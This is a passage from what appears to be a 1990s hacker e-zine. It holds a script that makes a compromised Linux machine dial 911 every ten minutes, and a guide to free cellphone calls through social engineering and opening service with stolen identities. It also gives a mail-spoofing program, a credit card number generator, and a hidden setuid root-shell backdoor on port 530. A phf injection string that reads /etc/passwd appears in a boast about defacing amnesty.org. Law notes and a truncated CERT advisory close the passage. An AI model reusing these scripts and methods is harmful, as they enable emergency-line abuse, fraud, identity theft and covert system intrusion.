UHF-TV channels (ie: 510 or 670 mhz with a hopping width of +/- 25 mhz) Keep in mind that the federal government can use virtually any frequency between DC and light. So get scanning now!! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. 911 Autodialler Script : dk ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, scenario... Your Friend g1mpfuck is on his linux system, you have never really liked him, and he has gone out to someplave for a few hours, to be back this evening... If you root his system, and run this, his modem will dial 911 every 10 mins, but as soon as you do run it, it will kill the pppd and dial the number, so if he's on IRC, then he will quit... Here it is! Read the instructions in the code first... #!/bin/sh # 911-autodial.sh # # for use with linux boxes running DIP. # dials 911 every ten minutes, and if the user is using pppd # it kills pppd in order to place the call. # IMPORTANT!!! # add this line to root's crontab with: crontab -e root # 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh # note: this assumes the modem device is: /dev/modem # if it is otherwise change "port modem" to # "port cua1" or whatever the modem device is # although it is usally /dev/modem. echo " get $local 0.0.0.0" >> /tmp/911.dip echo " get $remote 0.0.0.0" >> /tmp/911.dip echo " port modem" >> /tmp/911.dip echo " speed 38400" >> /tmp/911.dip echo " reset" >> /tmp/911.dip echo " send ATQ0V1E1X4\r" >> /tmp/911.dip echo " wait OK 2" >> /tmp/911.dip echo " dial 911" >> /tmp/911.dip ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check grep "^root" /tmp/ppp-check > /dev/null 2>&1 if [ $? -ne 0 ] ; then echo "PPP IS DEAD" > /tmp/ppp-dead fi if [ -f /tmp/ppp-dead ]; then /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 fi kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}` /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Cellular Calls Without Cloning : TRON ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ There are several ways to make free calls with a cellular phone that does not have service with the hassle of cloning it, or if you have a phone that can't be cloned or you don't want to buy the expensive equipment required, so here are a few ways to do it from home with little risk... 1.) American Roaming Network. ----------------------------- To reach the American Roaming Network (or something like it, depending on where you are), put your phone on the alternate carrier side so it says roam, then dial 0 and it should tell you your call is being forwarded. At that point you should be connected to an automated system, form here you have a couple of billing options... To use a credit or calling card, you enter the area code and number you want to call; for a calling card you then enter the card number and pin, for a credit card you then enter the card number and expirarion date, then the zip code of the billing address. ARN takes MasterCard, American Express, and most local and long distance company calling cards. They say they dont take VISA anymore, but I've gotten them to work on the automated system. If the number you call is busy or doesn't answer, you can press * and then either leave a message that the system will deliver, or try another number. If you want to dial another number you will have to put the zip code again after the new number. You can also make collect and 3rd party billed calls by dialing 0 instead of the number to call when you connect to ARN. You will be sent to an operator, tell them you would like to place a call. They will then ask how you would like to bill it. You can set up a local dialup voice mail box and change the greeting so it sounds like someone's there to accept the charges, the operator has to read a script, so you have to adjust the timing to get it just right. ARN will not 3rd party or collect bill to 800 numbers, nor will they place calls to 800 numbers charged to 3rd party numbers. 2.) Social Engineering. ----------------------- Another way is to dial 611 and tell the customer support person that you're having trouble getting through to the area you're trying yo call and could they try place the call for you. This works about 50% of the time, it helps to have the name and cell number of someone who has service with that provider in case they ask for it, they might ask for the social security number too, so be prepared, dumpster diving at a cell store is the easiest place to get that info. 3.) Set Up Service With Someone Else's Info. -------------------------------------------- The best way, and the one I prefer to cloning, is to get someone else's information and set up service. The best place to get the information you'll need is from a place that does credit checks, like a bank or car dealership. Make sure they have a good rating, like A, B or C, then you wont be asked for a deposit. You'll need a name, address, social security number, drivers license number and work number. You will also need a cell phone that is not stolen. They will not activate a stolen phone, when I tried they put me on hold and called the person who's phone I had and then told me the person wanted me to mail the phone back to them. Also find and write down the electronic serial number, you'll need that too. You then need to call a local cell service provider (ie. GTE MobilNet, Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell you about the different service plans and pick one. They will then ask for your "information" and ESN. Then they will ask to call you back with your new cell number, tell them that you're out and ask for a number to call them back at, they will have no problem with this. Then call them back and they will tell you how to program your new number into your phone, they might also tell you how to program in a new system ID and pagin channel etc, this is no big deal. Also ask when the billing cycle ends and when the bill is sent out, you will want to stop using this number when the person you're billing it to gets their bill. Be sure to get call features like 3-way and call forwarding, they're always useful to have. I prefer this to cloning because its less worry and hassle and it lasts up to a month. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. Getting Your Exploits Onto Systems : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ You want to get files or exploits onto another system, you can do this the following few ways... 1) Mail The User The File. -------------------------- This method is simple, easy to do, pretty undetectable, but sometimes may be a touch too slow, depending on the location / speed of the system...just mail login@host.com the file or whatever, then wait at the other side for them to get it. 2) FTP to the system. ---------------------- Using an FTP client, you can FTP to the remote server from your system, then upload the files to the server, but you will most probably get logged, and so if your exploits fail, this may not be such a good idea... 3) Use cat to input the file from the terminal. ----------------------------------------------- This is easy to do, pretty quick and effective, follow these steps... FearFactory:~:$ cat > heh.c << STOP #include main() { printf("Quit Laughin' At Yerself Yew Gimp :P\n"): } STOP FearFactory:~:$ cat heh.c #include main() { printf("Quit Laughin' At Yerself Yew Gimp :P\n"): } FearFactory:~:$ cc -o heh heh.c FearFactory:~:$ heh Quit Laughin' At Yerself Yew Gimp :P FearFactory:~:$ I used "cat > filename.c << STOP" to input the file from the terminal, I could have cut a file from another editor, then just pasted it to the terminal, then when I type "STOP" and hit enter, cat stops taking input from the terminal and EOF's the file...Then I cat it again, to prove that the STOP does not stay as part of the file, then I proceed to compile the source using cc and then I run the program, easy =) Always remember to remove traces of exploits from the system if you fail, as this is messy and could lead to the admin becoming suspicious, just keep your technique clean, and you will learn some good skills... Recommended Reading : --------------------- LINUX IN A NUTSHELL - A Desktop Quick Reference By Jessica Perry Hekman Copyright 1997 O'Reilly & Associates ISBN 1-56592-167-4 UK : œ14.99 US : $19.95 CAN : $28.95 I really like this book, its very easy to use, pretty compact, and 424 pages long, the information in it will boost your skills by a long way if you are a newbie, and there are alot of more advanced features, such as debugfs and many other programs and their syntax. Basically its a dictionary of Linux commands, along with a short explanation, the syntax for the command and many examples, I have the first printing, which is January 1997, so this book is not old at all, and pretty up-to-date... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Fakemailing Techniques : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Fakemailing is old and very very easy to do. To use this simple fakemailing program just make a file, such as letter.txt with the stuff you want to send in it, like "Hey Bill! how's it going?" or whatever. Next compile the fakemail.c using gcc -o sendfake sendfake.c ignore any warning messages. Run the program using "sendfake" and follow the steps, simple as that =) /**********************************************************/ /* SENDFAKE.C */ /* */ /* */ /* Author: asm@quantum.syspac.com */ /* */ /* To compile: gcc -o sendfake sendfake.c */ /* Usage : sendfake */ /* */ /**********************************************************/ #include #include #include #include #include #include #include #include #define MAXLEN 256 int s; int call_socket(char *hostname) { struct sockaddr_in sa; struct hostent *hp; int a, s; if ((hp=gethostbyname(hostname))==NULL) return(-1); bzero(&sa, sizeof(sa)); bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length); sa.sin_family = hp->h_addrtype; sa.sin_port = htons((u_short)25); if((s=socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0) return(-1); if(connect(s, &sa, sizeof(sa)) < 0) { close(s); return(-1); } return(s); } int readln(char *buf) { int to=0; char c; do { if(read(s, &c, 1)<1) return(0); if((c >= ' ') || (c <= 126)) if(to",from); writeln(str); readln(buf); do { input("Send fake mail TO",to); sprintf(str, "RCPT TO: <%s>",to); writeln(str); readln(buf); *(buf+3) = 0; if(atoi(buf) == 250) break; else printf("%s",buf+4); } while(1); input("Name of lamer getting the fake mail",name); input("Subject of fake mail",subject); writeln("DATA"); sprintf(str,"To: %s <%s>",name,to); writeln(str); if(strlen(subject)) { sprintf(str, "Subject: %s", subject); writeln(str); } do { input("File to read and include in fake mail",str); if(!strlen(str)) { close(s); exit(1); } if((fp = fopen(str,"rt")) == NULL) printf("Could not find file %s\n", str); else break; } while(1); while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str)); writeln("\n.\n"); readln(buf); writeln("QUIT\n"); printf("Sent!!!\n"); close(s); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Pascal Credit Card Generator Source : Lobster Guacamole ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PROGRAM ccnum; { Written by Lobster Guacamole. } { } { I wrote this program because I enjoy fucking over every goddam bureacratic } { and/or facist aspect of our society. This program simply spits out ten } { random credit card numbers based on the bank prefix used. See lines 58 } { through 61 for information on the bank prefix used. There is also a lame } { password feature for minor security. See lines 42 through 50 for } { information on the password feature. } { } { Remember, however, the numbers that are spit out may not work because } { the credit card company may not have assigned that number to a customer } { yet. Have fun! } { } { You can use a simple program like pas2c to translate this code into c } { - Tetsu Khan } USES Crt; VAR ccnum_count : Integer; PROCEDURE program_init; BEGIN Randomize; CheckBreak := False; END; PROCEDURE show_title; BEGIN ClrScr; Writeln; Writeln( 'CCNUM - Credit Card Number Generator.' ); Writeln( 'Written by Lobster Guacamole.' ); Writeln; END; PROCEDURE get_pwd; VAR program_pwd : String; BEGIN Writeln; Write( 'Enter password>' ); Readln( program_pwd ); IF program_pwd = 'a' THEN { The current password is a lower case } BEGIN { letter 'a'. Recompile the program if } Writeln; { you change the password, of course. } Writeln( 'Correct' ); { Change password on line 47 as well. } Writeln; END; IF program_pwd <> 'a' THEN { If you changed the password on line 40, } BEGIN { change it here, too. } Writeln; Writeln( 'Incorrect' ); Halt; END; END; PROCEDURE make_ccnum; VAR ccnum_digits : ARRAY[ 1..16 ] OF Integer; doub_odd_digits : ARRAY[ 1..8 ] OF Integer; digit_count : Integer; yn_choice : Char; added_digits : Integer; BEGIN ccnum_digits[1] := 5; { This part may have to be changed depending } ccnum_digits[2] := 4; { on the bank prefix used. The bank prefix } ccnum_digits[3] := 2; { here is '5424', the prefix for Citibank. } ccnum_digits[4] := 4; { Recompile the program if you change it. } REPEAT FOR digit_count := 5 TO 16 DO BEGIN ccnum_digits[ digit_count ] := Random(10); END; doub_odd_digits[1] := 2 * ccnum_digits[1]; IF doub_odd_digits[1] > 9 THEN doub_odd_digits[1] := doub_odd_digits[1] - 9; doub_odd_digits[2] := 2 * ccnum_digits[3]; IF doub_odd_digits[2] > 9 THEN doub_odd_digits[2] := doub_odd_digits[2] - 9; doub_odd_digits[3] := 2 * ccnum_digits[5]; IF doub_odd_digits[3] > 9 THEN doub_odd_digits[3] := doub_odd_digits[3] - 9; doub_odd_digits[4] := 2 * ccnum_digits[7]; IF doub_odd_digits[4] > 9 THEN doub_odd_digits[4] := doub_odd_digits[4] - 9; doub_odd_digits[5] := 2 * ccnum_digits[9]; IF doub_odd_digits[5] > 9 THEN doub_odd_digits[5] := doub_odd_digits[5] - 9; doub_odd_digits[6] := 2 * ccnum_digits[11]; IF doub_odd_digits[6] > 9 THEN doub_odd_digits[6] := doub_odd_digits[6] - 9; doub_odd_digits[7] := 2 * ccnum_digits[13]; IF doub_odd_digits[7] > 9 THEN doub_odd_digits[7] := doub_odd_digits[7] - 9; doub_odd_digits[8] := 2 * ccnum_digits[15]; IF doub_odd_digits[8] > 9 THEN doub_odd_digits[8] := doub_odd_digits[8] - 9; added_digits := doub_odd_digits[1] + doub_odd_digits[2] + doub_odd_digits[3] + doub_odd_digits[4] + doub_odd_digits[5] + doub_odd_digits[6] + doub_odd_digits[7] + doub_odd_digits[8] + ccnum_digits[2] + ccnum_digits[4] + ccnum_digits[6] + ccnum_digits[8] + ccnum_digits[10] + ccnum_digits[12] + ccnum_digits[14] + ccnum_digits[16]; UNTIL added_digits MOD 10 = 0; Writeln( ' ', ccnum_digits[1], ccnum_digits[2], ccnum_digits[3], ccnum_digits[4], ' ', ccnum_digits[5], ccnum_digits[6], ccnum_digits[7], ccnum_digits[8], ' ', ccnum_digits[9], ccnum_digits[10], ccnum_digits[11], ccnum_digits[12], ' ', ccnum_digits[13], ccnum_digits[14], ccnum_digits[15], ccnum_digits[16] ); END; BEGIN program_init; show_title; get_pwd; FOR ccnum_count := 1 TO 10 DO make_ccnum; END. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. in.courierd : backdoor on port 530 : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ As root do the following (without the %'s ;]) to setup the backdoor. -------------------------------------------------------------------- [This Method Has Been Tested On A Linux 2.0.30] % cp /bin/bash /usr/sbin/in.courierd % chmod 4755 /usr/sbin/in.courierd [optional, depends on system] % echo "courier stream tcp nowait root /usr/sbin/in.courierd" >> /etc/inetd.conf % /sbin/pidof inetd.conf [to find the pid of inetd.conf] % kill -HUP [replace the with the real pid] % telnet localhost 530 [test backdoor] All commands to the backdoor must end with ;, for example.... exit; ps -a; whoami; cd /; You are root when you use the backdoor, and you are not seen or logged. The last time I used this, it stayed up for 2 weeks =) The above commands I have tested in Linux, I have heard that you have to reboot a Sun for the new settings to take effect (shutdown -r now). But hey! its only a prototype at the moment until I make it cool and alot better =) Have fun. so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. UK Laws On Computer Misuse : Darkfool ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This part is actually useful info, not like Darkfools lesser works...Partially edited by me, the original can be now found at www.sinnerz.com/bible.htm - T_K Hey, this is an interesting little read. Please note it still can be quite interesting even if you don't like in UK - Darkfool. The 1990 Computer Misuse Act - UK --------------------------------- In plain English. ----------------- "An Act to make provision for securing computer material against unauthorised access or modification; and for connected purposes" { This is the long title (header) of the Act and confirms what the act does and applies to. } SECTION 1 Unauthorised access to computer material -------------------------------------------------- TEXT: A person is guilty of an offence if he causes a computer to perform any function with intent to secure access to any program or data held in any computer. { This means that if you can get access to files which you shouldn't be allowed to retrieve or read then you are committing a offence, this only applies if the person in question has intent ( meaning they are doing it on purpose, often referred to as hacking ) to carry this out. } A person is guilty of an Offence if the access he intends to secure is unauthorised; and he knows at the time when he causes the computer to perform the function that that is the case. { This means that the person is guilty doesn't have authorisation to secure access to files then he is committing an offence. The person is not guilty if he/she doesn't know what they are trying to perform. This applies to everything i.e. any program, a program or data of any particular kind and a program or data held } A person guilty of an offence under this section shall be liable on summary conviction to imprisonment for a term not exceeding six months or to a fine not exceeding level 5 on the standard scale or to both. { Meaning, you could go to prison for 6 months for committing an offence mentioned above ! You could also be subject to a fine @ level 5, which is always changing. You have to be convicted of the crime first though ;) } SECTION 2 Unauthorised access with intent to commit or facilitate ----------------------------------------------------------------- commission of further offences ------------------------------ A person is guilty of an offence under this section if he commits an offence under section 1 above. To commit an offence to which this section applies or to facilitate the commission of such an offence ( whether by himself or by any other person) and the offence he intends to commit or facilitate is referred to below in this section as the further offence. { This meaning that what is mentioned in section 2 applies to the person gaining unauthorised access to a computer system and to anyone who facilitates such a person } This section applies to offences for which a person of twenty-one years of age or over ( not previously convicted ) may be sentenced to imprisonment for a term of five years. { This means that if you re-offend or facilitate to re-offend and have been convicted you are liable to 5 years imprisonment or/and a large fine } SECTION 3 Unauthorised modification of computer material -------------------------------------------------------- A person is guilty of an offence if he/she does any act that causes an unauthorised modification of the contents of any computer; and at the time when he does the act he has the requisite intent and the requisite knowledge. { This means that if a person modifies computer material which he/she is not authorised to do he/she is guilty of committing an offence, however, the person must have the intent to carry out this crime else the person is not liable } { This next bit is the interesting bit } For the purposes of the above section the requisite knowledge is an intent to cause a modification of the contents of any computer and by so doing to impair the operation of any computer; to prevent or hinder access to any program or data held in any computer; to impair the operation of any such program or the reliability of any such data. The intent need not be directed at any particular computer; any particular program or data or a program or data of any particular kind; or any particular modification. { This basically means, if you have the intent and knowledge of breaking into computers, without have to actually do it you can be liable to an offence. } For the purposes of the Criminal Damage Act 1971 a modification of the contents of a computer shall not be regarded as damaging any computer or computer storage medium unless its effect on that computer storage medium, impairs its physical condition. { Meaning that you cannot be prosecuted for criminal damage whilst hacking into a machine unless you cause physical damage i.e. on site hacking, then taking a sledge hammer to the computer can be classed as criminal damage but change the password for root login is not criminal damage, unless you send the computer into high speed self destruct mode and ruin one of the heads on the 50 gig duke box ? } { A lot of the next part of the document is about jurisdiction and some technical mumbo jumbo } SECTION 14 Search warrants for offences under section 1 ------------------------------------------------------- Where a circuit judge is satisfied by information on oath given by a constable that there are reasonable grounds for believing that an offence under section 1 above has been or is about to be committed in any premises; and that evidence that such an offence has been or is about to be committed is in those premises he/she may issue a warrant authorising a constable to enter and search the premises, using such reasonable force as is necessary. { This basically means that if they believe that you have the intent or have broken into a system your not supposed to ( section 1 ) they can come around your house and knock your door in, or, open it for them nicely. } SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies --------------------------------------------------------------------------- The offences to which an order in council under section 2 of the extradition act 1870 can apply shall include offences under sections 2 and 3 and any conspiracy to commit such an offence and any attempt to commit an offence under section 3. { This meaning, that if you have a conspiracy to break into a system you can be extradited } In the UK it can be illegal to posses anything which may show an intent to hack, such as hacking documents. So, if your out there and in UK and didn't know that you were doing is most probably illegal then keep your head down ! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. so1o Gets Busted By CERT : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken pussy! and a cl000less one at that!@# Speadin' shit about stuff you dont know : [20:57] dude!! wassup? [20:59] so1o got busted by CERT! lol [21:00] yup [21:00] they have logs of him on over 80 computers [21:01] thats all i know is like what i just got forwarded to me [21:03] they got logs from when he used phfscan.c [21:03] and other shit any more info on so1o shit ? [21:06] l [21:06] Dear Sir. [21:06] We have now traced down the responsible account behind this attempt and=20 [21:06] have taken action against it. [21:06] If you would like to know who is behond this you should either file a=20 [21:06] report to the propper authoroties or fax pege Gustagsson at +++ 46 8=20 [21:06] 7132657 and ask him to trace this down in the phone network. [21:06] If you got any more question feel free to get back to me.. or if you=20 [21:06] think that this is to be considered as closed. [21:06] check this now [21:06] __ ____ Telia Internet=20 [21:06] / /_/ / Incident Response Team [21:06] / / \ / IRT@TELIA.NET [21:06] =09 FAX ++46 - 8 456 8935=20 [21:06] On Fri, 2 May 1997, m0dify wrote: [21:06] > That is the log from our www.usda.gov web server.... CERT also said that [21:06] > this log is on 80 computers since 4/1/97 . There was also a log on [21:06] > the 17th of April. =20 [21:07] > > Dear Sir. [21:08] > > This messages dropped down on my desk today. [21:08] > > I need a time to know who was on that dial up and so whe could hunt [21:08] > > him/her down in the phone network.. [21:08] heh... so1o fuct up it seems.. he's toast. [21:10] im glad to man... amnesty was just so uncool when he did that h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@# I've seen one of those logs that Modify had (now CERT have them too) and, I'm sooooo dissapointed to say... -I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S- Let us look at the facts...Those that Hostile and his little lameassfuck sIn wannabe haqr posse didn't even see : ------------------------------------------------------------------------------- THE FACTS : ------------------------------------------------------------------------------- CERT logs show that the phf queries to approximatley 80 sites on the same day that the www.amnesty.org page was changed show that this technique was used..which is fundementally incorrect, here is the phf query string found in the logs, the fact that this was on the same day as amnesty is the ONLY factor linking me to these events : GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd (I think there's also a "3D" somewhere in there too..) And here is the phf query code set down by every text I have ever read AND in phfscan.c which I would use if I ever wanted to scan such sites for the phf hole : GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd I think we can all see a slight difference, which basically says "IT'S NOT MY FUCKING STYLE! ONLY A LUNA-FUCKING-TICK would even think about using that technique. Seeing it probably wouldn't work anyway." The next point is the IP from where the queries originate, it is *.telia.com which I have been told is a SWEDISH ISP now, do I live in Sweden? NO!! Do I have any shells at dynamic IP's IN SWEDEN? NO!! There is no plausible way I could have run such a scan. Unless I dial long distance, which isn't gonna happen. One last point, I knew that we "0wned" amnesty.org from about 2 weeks before we actually decided to change the index.html, because when my friends broke in the first time, they had set up a .rhosts file and a suid root shell in something like /tmp/.... But when they left the system and tried to regain access, they found that the admin had removed the account or changed the login and pass, so we decided to leave the site for about a week and a half, until we started to try and formulate a way to get back in, in this period we did NO phf scanning whatsoever. And on the weekend when we did get back in, using an ingenious method that I was never told about, by a new hacker to our team, modeX, we decided to at least do something to prove we had regained access, so I designed a new index.html, to which the team uploaded. That was all that happened, and therefore the phf scans can IN NO WAY be related to the amnesty.org attack as we owned that system A LONG TIME before, and it was only a matter of regaining access, one last point being that we didn't walk through the amnesty "front door" as it were, as I was told we stumbled over a trusted host, shell.oil.ca or something like that. Anyway, thats just a few points I would like to raise in proving that sIn are again VERY CL000LESS fucks who know absolutely NOTHING about hacking or "the scene" in any way shape or form...And as for the Incident Response Team, they are most probably looking for some lamefuck Swedish haqr. Any-Fucking-Way, what the fuck they gonna do when they find this haqr?!@ arrest him for phf'ing 80 sites? h0h0h0, I wouldn't call that much of a bust :) "Listen sonny! you're gonna get 10 years for connecting to port 80 and typing "GET /cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd" becuase thats not against ANY law and CERT owns us all. so1o. There are alot of missing pieces, and alot of the data I base my argument on originated from m0dify (see the letter to IRT@TELIA.NET earlier) so I think I have more of an idea than Hostile the cl00less lame gimpfuck wannabe haqr. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7. CERT Advisory CA-97.13 : xlock vunerablity : Taken From Bugtraq ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Topic: Vulnerability in xlock ------------------------------------------------------------------------------- The CERT Coordination Center has received reports that a buffer overflow condition exists in some implementations of xlock. This vulnerability makes it possible for local users (users with access to an account on the system) to execute arbitrary programs as a privileged user. Exploitation information involving this vulnerability has been made publicly available. If your system is vulnerable, the CERT/CC team recommends installing a patch from your vendor. If you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot add a patch immediately, we urge you to apply the workaround described in Section III.B. We will update this advisory as we receive additional information. Please check our advisory files regularly for updates that relate to your site. ------------------------------------------------------------------------------- I. Description xlock is a program that allows a user to "lock" an X terminal. A buffer overflow condition exists in some implementations of xlock. It is possible attain unauthorized access to a system by engineering a particular environment and calling a vulnerable version of xlock that has setuid or setgid bits set. Information about vulnerable versions must be obtained from vendors. Some vendor information can be found in Appendix A of this advisory. Exploitation information involving this vulnerability has been made publicly available. Note that this problem is different from that discussed in CERT Advisory CA-97.11.libXt. II. Impact Local users are able to execute arbitrary programs as a privileged user without authorization. III. Solution Install a patch from your vendor as described in Solution A. If you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot install a patch immediately, we recommend Solution B. A. Obtain and install a patch for this problem. Below is a list of vendors who have provided information about xlock. Details are in Appendix A of this advisory; we will update the appendix as we receive more information. If your vendor's name is not on this list, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Berkeley Software Design, Inc. (BSDI) Cray Research - A Silicon Graphics Company Data General Corporation Digital Equipment Corporation FreeBSD, Inc. Hewlett-Packard Company IBM Corporation LINUX NEC Corporation The Open Group [This group distributes the publicly available software that was formerly distributed by X Consortium] Solbourne Sun Microsystems, Inc. B. We recommend the following workaround if you are not certain whether your system is vulnerable or if you know that your system is vulnerable and you cannot install a patch immediately. 1. Find and 